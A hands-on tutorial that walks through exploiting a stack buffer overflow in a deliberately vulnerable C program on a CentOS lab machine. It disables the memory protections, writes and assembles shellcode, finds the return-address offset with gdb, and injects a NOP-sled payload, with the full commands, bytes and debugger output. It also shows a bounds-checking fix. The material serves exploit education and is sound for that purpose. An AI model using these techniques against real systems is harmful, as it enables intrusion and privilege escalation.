Writing Buffer Overflows
Required Tools:
- gcc
- gdb
- nasm
- ld
- objdump
- python
This tutorial also assumes that you have a CentOS test environment. It was written using a fresh CentOS 6.3 virtual machine running on Oracle VirtualBox with 512 MB of RAM and an 8 GB hard drive, and it assumes Python 2 (version 2.6 was used for this documentation). If you have the above tools you'll be able to compile all the code and test it out on your CentOS box. Note that you will need root privileges to make some of the modifications specified. Both ld and objdump are part of the binutils package. To install the above software on CentOS use:
$ sudo yum install gcc gdb nasm binutils python
Introduction
Buffer overflows are some of the most prolific and dangerous vulnerabilities in computer security. The problem essentially boils down to two main factors. The first is that C doesn't enforce bounds checking, so if a programmer isn't careful to validate the size of input, unexpected behavior may occur. The second is that many programs written in C run with elevated privileges. This means that an exploit of such a program yields effective control at the privilege level of the exploited process. Since many of these processes run as root, or SYSTEM, successfully exploiting them gives a malicious user a privilege escalation that amounts to total control over the target machine.
Buffer overflow exploits are accomplished by abusing the way that C programs lay out memory. When a C program begins, or calls a function, it allocates a region of the stack for that particular piece of the program. This region consists of space for variables and data, as well as a pointer that returns flow control to the proper place in the program. This allows the stack to grow dynamically as programs carry out subroutines. This is efficient because the stack doesn't have to be initialized at the start of the program with room for every possible execution path. Instead, as the program runs, memory is allocated on an as-needed basis.
Programs don't run in a vacuum, however, and one piece of a program can't be allowed to own the stack entirely until its completion. For this reason the return pointer on these individual pieces of the stack (called stack frames) is critical, so that at the end of the frame's execution the processor can return to the original instructions and continue the program.
Because these frames are allocated dynamically and because they are of a fixed size, if a programmer is not careful it becomes possible to pass in more variable data than is reserved on the stack. For instance, if the following represents a frame:
------------------
| data           |
------------------
| data           |
------------------
| data           |
------------------
| data           |
------------------
| data           |
------------------
| return pointer |
------------------
You can see that there are 5 'slots' for data in the frame; the sixth slot is for the return pointer. What happens if the program tries to write 6 'slots' of data into the frame? A crash, probably, but a careful attacker could overwrite the return pointer so that it points to a different location in memory, perhaps a location that contains malicious code.
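The slot picture above can be mimicked with a toy model. This is only a sketch in Python, not how C actually stores a frame: the list, the function name write_to_frame, and the placeholder strings are all made up for illustration.

```python
# Toy model of the frame drawn above: five data slots, then the return pointer.
FRAME_SLOTS = 5

def write_to_frame(values, return_pointer="RETURN_TO_CALLER"):
    """Copy values into the frame with no bounds check, as careless C code would."""
    memory = ["empty"] * FRAME_SLOTS + [return_pointer]
    for i, value in enumerate(values):
        memory[i] = value          # nothing stops i from reaching the sixth slot
    return memory

safe = write_to_frame(["d1", "d2", "d3", "d4", "d5"])
smashed = write_to_frame(["d1", "d2", "d3", "d4", "d5", "ATTACKER_ADDRESS"])

print(safe[-1])      # RETURN_TO_CALLER
print(smashed[-1])   # ATTACKER_ADDRESS
```

Five values leave the return pointer alone; a sixth value silently replaces it, which is the whole trick behind the exploit.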
Turning Off Stack Randomization
Before we get too far into this tutorial let's make sure to create an 'easier' environment for our work. The Linux VA patch is a modification to the kernel that allows for stack randomization, which makes it much harder to create reliable buffer overflow exploits. This patch randomizes the location of the stack, making it more difficult to find our jump address to kick off the exploit. It's possible to carry out the exploit with this patch enabled, just much more difficult. Check to make sure the Linux VA patch is disabled as follows. First check to see if randomize_va_space is turned off (set to zero):
$ cat /proc/sys/kernel/randomize_va_space
0
Red Hat also implements another layer of protection called Exec Shield. Exec Shield is a form of Data Execution Prevention (DEP) that makes certain portions of memory space non-executable. You'll want to disable this protection as well. You can check to see if Exec Shield is enabled using the command:
$ cat /proc/sys/kernel/exec-shield
0
If you happen to find either of these enabled (set to a non-zero number) then disable them by adding the following lines to /etc/sysctl.conf (you'll need root to do this):
kernel.randomize_va_space = 0
kernel.exec-shield = 0
Finally you can load these new values into the running kernel using the command:
$ sudo sysctl -p
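Both checks can also be scripted. The following is a minimal sketch that reads the same two /proc files; the helper names read_setting and describe are invented here, and a missing file (exec-shield only exists on Red Hat style kernels) is reported rather than treated as an error.

```python
def read_setting(path):
    """Return the integer stored in a /proc/sys file, or None if it cannot be read."""
    try:
        with open(path) as handle:
            return int(handle.read().strip())
    except (IOError, OSError, ValueError):
        return None

def describe(value):
    """Turn a setting value into a short human-readable status."""
    if value is None:
        return "not available on this kernel"
    return "disabled" if value == 0 else "ENABLED (value %d)" % value

for name in ("randomize_va_space", "exec-shield"):
    print("%-20s %s" % (name, describe(read_setting("/proc/sys/kernel/" + name))))
```

Anything other than "disabled" for a setting that exists means the sysctl.conf change above has not taken effect yet.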
The most effective way to exploit an overflow like this is to pass in malicious bytecode as part of the 'data' and then overwrite the return pointer with the location of that bytecode. Even this process is tricky though, because the return pointer must point to the exact start of the exploit code or the code will fail. For instance, if the pointer lands in the middle of the exploit code it won't execute properly. A neat trick is to pad the start of the exploit shellcode with NOP (no operation) instructions. When the machine encounters a NOP it simply moves to the next instruction. If there is a series of NOP instructions preceding the malicious shellcode then the pointer merely has to hit one of them, and execution will slide down the NOPs to the shellcode. This technique is called a NOP sled.
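To see why a sled makes the target so much bigger, here is a small simulation. It is a sketch only: the three payload bytes are arbitrary stand-ins rather than real instructions, and the slide function is a hypothetical helper that just skips over 0x90 bytes the way the processor would.

```python
NOP = 0x90
SLED_LENGTH = 30

# Stand-in bytes for the real instructions; the values are placeholders only.
payload = bytearray([0xAA, 0xBB, 0xCC])
memory = bytearray([NOP] * SLED_LENGTH) + payload

def slide(memory, landing_offset):
    """Skip NOPs from landing_offset and return where real execution would begin."""
    position = landing_offset
    while position < len(memory) and memory[position] == NOP:
        position += 1
    return position

# Landing anywhere inside the sled ends at the first payload byte.
print([slide(memory, offset) for offset in (0, 7, 29)])   # [30, 30, 30]
# Landing inside the payload skips its first byte, so the code is broken.
print(slide(memory, 31))                                   # 31
```

With a 30 byte sled there are 31 landing offsets that work instead of exactly one.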
Other Fine Tuning
You may notice that a lot of tutorials online tell you to examine the core dumps of programs that throw segmentation faults. On your own modern Linux box you might find that your buffer overflow attempts cause a segmentation fault, but not a core dump. Core dumps can be controlled (if you have sufficient privileges) at the command line as part of your user profile. To check if you have core dumps enabled try:
$ ulimit -c
0
If you see the above output (a zero) it means core dumps are disabled. Go ahead and change that using:
$ ulimit -c unlimited
This will enable you to view the core dump of your files using GDB. The syntax is:
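$ gdb program corefile
Where program is the executable that crashed and corefile is the core dump it produced. Next, check whether SELinux is enabled: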
$ cat /selinux/enforce
If you get a 'no such file' error then SELinux is turned off. Otherwise edit the file /etc/selinux/config, change the value of SELINUX to disabled, and restart your machine.
A Further Look at Stack
When you read about buffer overflows you'll read a lot about stacks, heaps, frames and the buffer. It's all a little confusing, even if you understand some of the topics, so it's worth examining more closely. As programs are executed they are assigned blocks of memory. Ultimately these are just places in RAM. The processor runs through the instructions in memory in the order supplied to it by a register called the instruction pointer (eip on our 32-bit machine). This register keeps track of which instruction is to be passed to the processor next and where it is located. When a program starts it is assigned a block of memory that looks something like this:
High Addresses
---------------------------
| Arguments and variables |
---------------------------
| Stack                   |
---------------------------
| Stack                   |
---------------------------
| Unused Memory           |
---------------------------
| Unused Memory           |
---------------------------
| Heap                    |
---------------------------
| Program Data            |
---------------------------
Low Addresses
Ok, so that looks a little weird, but it easily demonstrates how the stack can grow down and the heap can grow up. Those are the two areas where dynamic memory is utilized.
The stack is reserved for dynamic input and function variables. You need this to be dynamic because when a program is compiled it has no idea what sort of input it will get or need to assign to a variable. Some variables might get their value from user input, some from the system, some from reading files, and so on. You can see how it would be impossible for the program to calculate ahead of time what sort of input it would get (and how that might cause the program to branch). So the program lines up the instructions in the 'Low Addresses' (the Program Data) part of the diagram. As it runs into blocks of code it allocates space on the stack to hold the variables.
So let's say the program starts with main(). The computer allocates a frame on the stack for the main() function that holds its variables, etc. So the stack looks something like:
------------------
| data           |
| data           |
| return address |
------------------
I've drawn this upside down because it's easier to understand as a stack in this orientation. Now the register points at the top of the frame and begins to feed instructions into the processor. Let's say the program calls a function called foo() in main() though. What happens then? Well, a new frame is added to the stack, with the return pointer at the end showing the register where to move next once it's done with the particular frame. Now the stack might look something like:
------------------
| data           |
| return address |
------------------
| data           |
| data           |
| return address |
------------------
Now the variables for foo() are on top of the stack. The return pointer is at the end, showing the register where to move to pick back up in main() at the point after the function foo() is called. It is important to note that these pointers show the register where to return to execute program instructions, which are held at the bottom of the memory diagram as program data. Knowing this you can see why a return pointer is necessary, rather than having the program just chew down the stack.
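The push and pop behaviour described above can be sketched with a plain list. This is a toy model, not a real call stack: the call and ret helpers and the descriptive strings are invented for illustration.

```python
call_stack = []

def call(function_name, return_to):
    """Push a frame recording where execution resumes when the function ends."""
    call_stack.append({"function": function_name, "return_to": return_to})

def ret():
    """Pop the top frame and hand back its saved return location."""
    return call_stack.pop()["return_to"]

call("main", "exit to the operating system")
call("foo", "instruction in main() after the call to foo()")

after_foo = ret()     # foo() finishes first because its frame is on top
after_main = ret()
print(after_foo)
print(after_main)
```

Each frame carries its own return location, so whoever controls that one value in the top frame controls where the program goes next.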
A Look at the Victim
Let's examine the following code for the blame program. The code actually makes a rudimentary attempt to prevent a buffer overflow exploit, but one which doesn't work.
#include <stdio.h>
#include <string.h>

#define INPUT_BUFFER 256 /* maximum name size */

/*
 * read input, copy into s
 * gets() is insecure and prints a warning
 * so we use this instead
 */
void getlines(char *s)
{
    int c;

    while ((c=getchar()) != EOF)
        *s++ = c;
    *s = '\0';
}

/*
 * convert newlines to nulls in place
 */
void purgenewlines(char *s)
{
    int l;

    l = strlen(s);
    while (l--)
        if (s[l] == '\n')
            s[l] = '\0';
}

int main()
{
    char scapegoat[INPUT_BUFFER];

    getlines(scapegoat);
    /* this check ensures there's no buffer overflow */
    if (strlen(scapegoat) < INPUT_BUFFER) {
        purgenewlines(scapegoat);
        printf("It's all %s's fault.\n", scapegoat);
    }
    return 0;
}
Looking at the code you can see that the main() function sets up the char array scapegoat with a size set to the constant INPUT_BUFFER (which is 256). A pointer to this array is then passed to the getlines() function, which copies the program's input into scapegoat using getchar(). The problem is that by the time getlines() finishes and control returns to main() the buffer has already been overflowed, so the check for length that occurs as the next instruction:
if (strlen(scapegoat) < INPUT_BUFFER) {
happens too late (the chicken has already flown the coop). Let's begin to explore how this particular buffer overflow works. Copy the code above into a text file on your CentOS machine and save it as blame.c then compile it using the command (which will disable some additional stack protections implemented by the compiler):
$ gcc -fno-stack-protector -z execstack blame.c -o blame
Overflowing the Buffer
First let's ensure that we actually can overflow the buffer. We'll use a little Python at the command line to create some input, then check out what is going on using gdb. First, however, I'll demonstrate blame working correctly:
$ echo foo | ./blame
It's all foo's fault.
$ python -c 'print "A"*456' | ./blame
Segmentation fault
You should see the program crash and a new core file in your current directory (note that the extension may vary since it's the process ID (PID) of the program when it crashes):
$ ls
blame  blame.c  core.1291
You can look at this core file using gdb like so:
$ gdb blame core.1291
GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/justin/blame...(no debugging symbols found)...done.
[New Thread 1291]
Missing separate debuginfo for
Try: yum --disablerepo='*' --enablerepo='*-debug*' install /usr/lib/debug/.build-id/05/14ca88cad3d3d3eee1b7561eaf052da205c024
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./blame'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.107.el6_4.4.i686
We can see that the program terminated at 0x41414141. This is no coincidence, since 0x41 is the hexadecimal ASCII code for a capital A.
We can use gdb to show us the values of all the registers at the time of the crash. This will show us the value of the extended base pointer (ebp) as well as the extended stack pointer (esp), which the computer uses to track execution in the memory stack. To view the registers use the info registers command in gdb like so:
(gdb) info registers
eax            0x0          0
ecx            0x20         32
edx            0x5          5
ebx            0x2c3ff4     2899956
esp            0xbffff630   0xbffff630
ebp            0x41414141   0x41414141
esi            0x0          0
edi            0x0          0
eip            0x41414141   0x41414141
eflags         0x10216      [ PF AF IF RF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
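The link between the crash address and our input is easy to confirm. A minimal sketch using Python's struct module to turn the register value back into the bytes that were sitting in memory:

```python
import struct

eip = 0x41414141
raw = struct.pack("<I", eip)          # the four bytes as they sat in memory
print(raw.decode("ascii"))            # AAAA
print(hex(ord("A")))                  # 0x41
```

The same check works for any other filler character, which is handy later when several different letters are used to find the exact overwrite position.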
Looking at the output you can see that the ebp and the eip have both been overwritten with a series of ASCII A's. The eip in particular is the pointer to the next instruction, and the memory address 0x41414141 falls outside of our stack range and thus the program crashed.
A Simple Fix
A simple change in the function will prevent this behavior, but you can easily see how a vulnerability such as this could be overlooked. If getlines() is rewritten as:
void getlines(char *s)
{
    int c;
    int x = 0;

    while ((c=getchar()) != EOF && x < INPUT_BUFFER - 1) {
        *s++ = c;
        x++;
    }
    *s++ = '\0';
}
The program functions safely regardless of the input size. This modification also prevents the gnarly segfault errors from showing up, effectively handling exceptions in a cleaner manner.
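The difference between the two versions comes down to how many bytes each loop is willing to write. Here is a rough model of that count in Python; the two function names are made up, and they only count bytes rather than touching real memory.

```python
INPUT_BUFFER = 256

def getlines_unbounded(data):
    """Model of the original loop: returns how many bytes get written."""
    return len(data) + 1                      # every input byte plus the '\0'

def getlines_bounded(data):
    """Model of the fixed loop: stops after INPUT_BUFFER - 1 input bytes."""
    return min(len(data), INPUT_BUFFER - 1) + 1

attack = b"A" * 456
print(getlines_unbounded(attack) > INPUT_BUFFER)   # True: writes past the array
print(getlines_bounded(attack) <= INPUT_BUFFER)    # True: always fits
```

The original loop's write count depends entirely on the attacker's input, while the fixed loop can never exceed the 256 bytes that were reserved.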
Back to Our Regularly Scheduled Exploit
Ok, so now back to our exploit. We know now that an input size of 456 bytes will cause a buffer overflow and overwrite the eip. If we can exploit this weakness we can cause the program to execute some arbitrary commands. Let's begin with what is arguably the most difficult part of this process, our shellcode. While there are shellcode generators out there online, it's a lot more useful to be able to build your own, especially if you want to be able to craft very specific behavior out of your buffer overflow.
Generating Shellcode
Let's create some shellcode that makes blame print out the output "now I p0wn your computer" instead of its normal function. Usually you'll want a buffer overflow to spawn a shell or perhaps open a backdoor listening port on the target computer, but we'll keep it simple for now. Shellcode, often referred to as bytecode, is basically just assembled machine code. Now, don't worry if you don't know a whole lot of assembly at this point, we're going to leverage some tools to help make it easier. The first thing we want to do is create a program to test our bytecode, using the following:
/*shellcodetest.c*/
char shellcode[] = "substitute shellcode here";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) shellcode;
    (int)(*func)();
}
We can substitute our shellcode for the "substitute shellcode here" portion. Go ahead and create the file shellcodetest.c by copying and pasting the above. Next compile this program so we can use it (I'm assuming you know how to compile raw C code but I'll go ahead and be explicit here just in case):
$ gcc -o shellcodetest shellcodetest.c
This creates the executable shellcodetest in the current working directory. Now, it isn't going to work at this point since we don't actually have any shellcode assigned to the shellcode[] variable. Let's go ahead and tackle that challenge now.
For this task we're totally going to gank the hello.asm code from http://www.vividmachines.com/shellcode/shellcode.html (see citations below) and modify it to suit our purposes. You can use C to generate your shellcode as well, but there are some problems that crop up along the way. For instance, you generally cannot have any null bytes (\x00) in your shellcode, because C treats a null as the end of a string (string functions such as strcpy() stop copying as soon as they encounter a null, so your shellcode won't be loaded into memory entirely). For now we'll gloss over how to modify your assembly code using 'xor' to get rid of these null bytes and keep things simple. The code we're going to use is as follows:
;hello.asm
[SECTION .text]

global _start

_start:
        jmp short ender

starter:
        xor eax, eax    ;clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx

        mov al, 4       ;syscall write
        mov bl, 1       ;stdout is 1
        pop ecx         ;get the address of the string from the stack
        mov dl, 24      ;length of the string
        int 0x80

        xor eax, eax
        mov al, 1       ;exit the shellcode
        xor ebx,ebx
        int 0x80

ender:
        call starter    ;put the address of the string on the stack
        db 'now I p0wn your computer'
If we were really l337 we'd use 'now I p0wn j00r b0x3n' as our string, but that's another tutorial ;) For now we do the following:
$ nasm -f elf hello.asm
$ ld -o hello hello.o
You can confirm that everything worked properly by executing the hello program at the command line:
$ ./hello
now I p0wn your computer$
Once you're sure your assembly code works it's time to look at the disassembly so that we can pull out the hexadecimal instruction bytes to use as our shellcode:
$ objdump -d hello

hello:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:   eb 19                   jmp    804809b <ender>

08048082 <starter>:
 8048082:   31 c0                   xor    %eax,%eax
 8048084:   31 db                   xor    %ebx,%ebx
 8048086:   31 d2                   xor    %edx,%edx
 8048088:   31 c9                   xor    %ecx,%ecx
 804808a:   b0 04                   mov    $0x4,%al
 804808c:   b3 01                   mov    $0x1,%bl
 804808e:   59                      pop    %ecx
 804808f:   b2 18                   mov    $0x18,%dl
 8048091:   cd 80                   int    $0x80
 8048093:   31 c0                   xor    %eax,%eax
 8048095:   b0 01                   mov    $0x1,%al
 8048097:   31 db                   xor    %ebx,%ebx
 8048099:   cd 80                   int    $0x80

0804809b <ender>:
 804809b:   e8 e2 ff ff ff          call   8048082 <starter>
 80480a0:   6e                      outsb  %ds:(%esi),(%dx)
 80480a1:   6f                      outsl  %ds:(%esi),(%dx)
 80480a2:   77 20                   ja     80480c4 <ender+0x29>
 80480a4:   49                      dec    %ecx
 80480a5:   20 70 30                and    %dh,0x30(%eax)
 80480a8:   77 6e                   ja     8048118 <ender+0x7d>
 80480aa:   20 79 6f                and    %bh,0x6f(%ecx)
 80480ad:   75 72                   jne    8048121 <ender+0x86>
 80480af:   20 63 6f                and    %ah,0x6f(%ebx)
 80480b2:   6d                      insl   (%dx),%es:(%edi)
 80480b3:   70 75                   jo     804812a <ender+0x8f>
 80480b5:   74 65                   je     804811c <ender+0x81>
 80480b7:   72                      .byte 0x72
What we've done here is assemble the code with nasm, link it with ld, and disassemble the result with objdump. The important values (the good stuff) are contained in the second column of the output (for example, the 'eb 19' on the first line under _start). The odd-looking instructions after the call are just objdump trying to disassemble the bytes of our string. If you copy all of these bytes out and preface each one with "\x" then you have valid shellcode.
So copying out the above example gives us the following 56 bytes:
eb 19 31 c0 31 db 31 d2 31 c9 b0 04 b3 01 59 b2 18 cd 80 31 c0 b0 01 31 db cd 80 e8 e2 ff ff ff 6e 6f 77 20 49 20 70 30 77 6e 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72
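Copying bytes by hand is error prone, so the conversion can be scripted. This is a small sketch that takes the byte listing above as text, counts it, checks for null bytes, and adds the "\x" prefixes; the variable names are made up for illustration.

```python
# The byte listing copied from the objdump output above.
dump = """
eb 19 31 c0 31 db 31 d2 31 c9 b0 04 b3 01 59 b2 18 cd 80 31 c0 b0 01 31 db
cd 80 e8 e2 ff ff ff 6e 6f 77 20 49 20 70 30 77 6e 20 79 6f 75 72 20 63 6f
6d 70 75 74 65 72
"""

byte_values = [int(token, 16) for token in dump.split()]
escaped = "".join("\\x%02x" % value for value in byte_values)

print(len(byte_values))        # 56
print(0 in byte_values)        # False: no null bytes to cut the input short
print(escaped)
```

The last line printed is the escaped string, ready to paste between double quotes in a C or Python string literal.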
We transform this into shellcode and put it into our test program above:
/* revised shellcodetest.c */
/* now with working code :) */
char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3"\
"\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff"\
"\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72"\
"\x20\x63\x6f\x6d\x70\x75\x74\x65\x72";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
}
Let's test out the above code to make sure it works. Save the modified file as shellcodetest.c. Next we'll have to compile the program using gcc and a couple of handy flags that will disable stack protection and stack execution protection as they are enabled in the compiler itself. Compile it using the following command (note this is just one line):
$ gcc -fno-stack-protector -z execstack -o shellcodetest shellcodetest.c
Then test the shellcode to see if it works:
$ ./shellcodetest
now I p0wn your computer
Injecting the Shellcode
Ok, the next part of the process is to actually inject the shellcode into a running process with a buffer overflow exploit. First let's examine our overflow of the blame program. We know that with 456 bytes of A's the eip is overwritten with four bytes worth of A's, or 0x41414141. If we examine this behavior more closely we'll find that the A's that overwrite the eip aren't in fact the last four A's of the payload.
$ python -c 'print "A"*100 + "B"*56 + "C"*300' | ./blame
Segmentation fault (core dumped)
$ ls
blame  blame.c  core.1291  core.1315
We can now look at this new core file, noting that it crashed trying to execute the invalid address 0x43434343 and that the eip is overwritten with 43's, the hexadecimal ASCII code for the letter C.
$ gdb blame core.1315
[New Thread 1315]
Core was generated by `./blame'.
Program terminated with signal 11, Segmentation fault.
#0  0x43434343 in ?? ()
(gdb) i r
eax            0x0          0
ecx            0x20         32
edx            0x9          9
ebx            0x2c3ff4     2899956
esp            0xbffff630   0xbffff630
ebp            0x43434343   0x43434343
esi            0x0          0
edi            0x0          0
eip            0x43434343   0x43434343
eflags         0x10216      [ PF AF IF RF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
You'll notice I used a shorthand for the info registers command by simply typing i r to get the same data. This technique of running the program, dumping the core, then examining the core file with gdb is handy, but somewhat time consuming. What we actually want to do is run this process from within gdb to cut down on time. We can do this by firing up gdb and running the blame program and redirecting input from a file. We can jump out of gdb at any time to modify this text file using:
(gdb) shell
$
Then returning to gdb using the command:
$ exit
(gdb)
This will allow us to modify our input text file quickly and easily. What we're trying to do is use A, B, and C to line up four bytes in the eip that we can use to point to our shell code. When we can overwrite the eip, and only the eip, with four letter B's then we know exactly how to align our buffer overflow so that the overwritten eip is within our control (and can be used to point to our shellcode). Let's get started as follows:
$ python -c 'print "A"*100 + "B"*4 + "C"*250' > input
$ cat input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [... snip ...]
$ gdb blame
(gdb) run blame < input
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r
eax            0x0          0
ecx            0x20         32
edx            0x3          3
ebx            0x2c3ff4     2899956
esp            0xbffff5f0   0xbffff5f0
ebp            0x43434343   0x43434343
esi            0x0          0
edi            0x0          0
eip            0x43434343   0x43434343
eflags         0x10212      [ AF IF RF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
It looks like on our first try the eip is being overwritten with C characters, so let's increase the number of A's and decrease the number of C's like so:
(gdb) shell
$ python -c 'print "A"*300 + "B"*4 + "C"*52' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0          0
ecx            0x20         32
edx            0x5          5
ebx            0x2c3ff4     2899956
esp            0xbffff5f0   0xbffff5f0
ebp            0x41414141   0x41414141
esi            0x0          0
edi            0x0          0
eip            0x41414141   0x41414141
eflags         0x10216      [ PF AF IF RF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
As we can see we have overshot the mark and now eip is overwritten with A's. We continue this process until we can narrow in on a way to place the B's over the eip like so:
(gdb) shell
$ python -c 'print "A"*250 + "B"*4 + "C"*102' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) shell
$ python -c 'print "A"*270 + "B"*4 + "C"*82' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x42424141 in ?? ()
And now you can see I've managed to get a couple of B's (0x42 in ASCII) into the eip, so I now know that to overwrite the eip with B's I need 268 A's first, then my B's, then 84 C's.
(gdb) shell
$ python -c 'print "A"*268 + "B"*4 + "C"*84' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax            0x0          0
ecx            0x20         32
edx            0x5          5
ebx            0x2c3ff4     2899956
esp            0xbffff5f0   0xbffff5f0
ebp            0x41414141   0x41414141
esi            0x0          0
edi            0x0          0
eip            0x42424242   0x42424242
eflags         0x10216      [ PF AF IF RF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
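The jump from the 0x42424141 crash to the figure of 268 is simple arithmetic, sketched below. The helper name offset_from_crash is made up, and the calculation only holds when the payload is a run of A's followed directly by B's and the eip value contains nothing but those two letters.

```python
import struct

def offset_from_crash(a_count, eip):
    """Given a payload of a_count A's followed by B's, find where eip begins."""
    overwritten = struct.pack("<I", eip)        # bytes in memory order
    return a_count - overwritten.count(b"A")

print(offset_from_crash(270, 0x42424141))   # 268
print(offset_from_crash(268, 0x42424242))   # 268
```

In the 270 A run the eip held two A's and two B's, so the last two A's landed inside the return pointer and it must begin 268 bytes into the input.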
And voilà, now I have the exact boundaries of my exploit! Now, let's add our shellcode (which is 56 bytes long) to the end, replacing the 84 C characters and using a NOP sled at the beginning. We can then use gdb to examine the actual contents of the stack, in this case looking at the 256 bytes starting at the esp, and check that our shell code is actually there:
(gdb) shell
$ python -c 'print "A"*268 + "B"*4 + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax            0x0          0
ecx            0x20         32
edx            0x1          1
ebx            0x2c3ff4     2899956
esp            0xbffff5f0   0xbffff5f0
ebp            0x41414141   0x41414141
esi            0x0          0
edi            0x0          0
eip            0x42424242   0x42424242
eflags         0x10216      [ PF AF IF RF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/256xb $esp
0xbffff5f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff5f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff600: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff608: 0x90 0x90 0x90 0x90 0x90 0x90 0xeb 0x19
0xbffff610: 0x31 0xc0 0x31 0xdb 0x31 0xd2 0x31 0xc9
0xbffff618: 0xb0 0x04 0xb3 0x01 0x59 0xb2 0x18 0xcd
0xbffff620: 0x80 0x31 0xc0 0xb0 0x01 0x31 0xdb 0xcd
0xbffff628: 0x80 0xe8 0xe2 0xff 0xff 0xff 0x6e 0x6f
0xbffff630: 0x77 0x20 0x49 0x20 0x70 0x30 0x77 0x6e
0xbffff638: 0x20 0x79 0x6f 0x75 0x72 0x20 0x63 0x6f
0xbffff640: 0x6d 0x70 0x75 0x74 0x65 0x72 0x0a 0x00
0xbffff648: 0x02 0x00 0x00 0x00 0x70 0x83 0x04 0x08
0xbffff650: 0x00 0x00 0x00 0x00 0x20 0x4d 0x12 0x00
0xbffff658: 0x0b 0xcc 0x14 0x00 0xc4 0xef 0x12 0x00
0xbffff660: 0x02 0x00 0x00 0x00 0x70 0x83 0x04 0x08
0xbffff668: 0x00 0x00 0x00 0x00 0x91 0x83 0x04 0x08
0xbffff670: 0x8d 0x84 0x04 0x08 0x02 0x00 0x00 0x00
0xbffff678: 0x94 0xf6 0xff 0xbf 0xf0 0x84 0x04 0x08
0xbffff680: 0xe0 0x84 0x04 0x08 0xa0 0xf4 0x11 0x00
0xbffff688: 0x8c 0xf6 0xff 0xbf 0x00 0x00 0x00 0x00
0xbffff690: 0x02 0x00 0x00 0x00 0xc0 0xf7 0xff 0xbf
0xbffff698: 0xd3 0xf7 0xff 0xbf 0x00 0x00 0x00 0x00
0xbffff6a0: 0xd9 0xf7 0xff 0xbf 0xf8 0xf7 0xff 0xbf
0xbffff6a8: 0x08 0xf8 0xff 0xbf 0x1c 0xf8 0xff 0xbf
0xbffff6b0: 0x2a 0xf8 0xff 0xbf 0x4b 0xf8 0xff 0xbf
0xbffff6b8: 0x5e 0xf8 0xff 0xbf 0x6a 0xf8 0xff 0xbf
0xbffff6c0: 0x77 0xfe 0xff 0xbf 0x83 0xfe 0xff 0xbf
0xbffff6c8: 0xd6 0xfe 0xff 0xbf 0xf2 0xfe 0xff 0xbf
0xbffff6d0: 0x01 0xff 0xff 0xbf 0x12 0xff 0xff 0xbf
0xbffff6d8: 0x26 0xff 0xff 0xbf 0x37 0xff 0xff 0xbf
0xbffff6e0: 0x40 0xff 0xff 0xbf 0x57 0xff 0xff 0xbf
0xbffff6e8: 0x69 0xff 0xff 0xbf 0x71 0xff 0xff 0xbf
